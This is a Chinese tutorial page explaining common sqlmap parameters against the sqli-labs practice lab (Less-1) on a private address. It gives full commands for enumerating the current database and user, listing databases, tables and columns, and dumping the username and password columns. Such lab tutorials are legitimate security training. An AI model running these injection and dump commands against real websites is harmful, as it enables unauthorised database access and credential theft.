sqlmap 常用注入参数(一)

 时间:2026-02-14 02:06:06

1、所有参数以sqli-labs第一关为例, python2 sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" -u针对目标网站id参数注入测试,也可后面添加&uid=2",所有参数进行测试,检测出含有id注入漏洞。

sqlmap 常用注入参数(一)

2、获取当前数据库参数--current-db, python2 sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" --current-db。检测出当前数据库名称为

security。

sqlmap 常用注入参数(一)

sqlmap 常用注入参数(一)

3、--current-user检测当前用户参数, python2 sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" --current-user,检测出当前用户为root。

sqlmap 常用注入参数(一)

sqlmap 常用注入参数(一)

4、--dbs检测出数据库中所有库的名称, python2 sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" --dbs。

sqlmap 常用注入参数(一)

sqlmap 常用注入参数(一)

5、-D 数据库 --tables获取参数中数据所有表的名称, python2 sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" -D security --tables。

sqlmap 常用注入参数(一)

sqlmap 常用注入参数(一)

6、-D 数据库 -T 表 --columns获取参数中数据中表的所有列, python2 sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" -D security -T users --columns,以users表为例如下。

sqlmap 常用注入参数(一)

sqlmap 常用注入参数(一)

7、-D security -T users -C username,password -dump获取security数控中users表中username跟password的数据信息,python2 sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" -D security -T users -C username,password --dump。

sqlmap 常用注入参数(一)

sqlmap 常用注入参数(一)

  • 【Java】如何通过POI设置Excel的边框
  • 如何处理 ORA-28002 password will expire 错误
  • Win10桌面设置审核登录成功事件?
  • Notepad++设置左侧文件夹树结构?LightExplorer
  • XShell如何导入导出会话、连接
  • 热门搜索
    惮怎么读 朝阳轮胎质量怎么样 苜蓿的做法 麻辣豆腐的家常做法 松子玉米的做法 赟怎么读 失眠多梦是怎么回事 打印机脱机怎么处理 甜甜圈做法 华为手机怎么录屏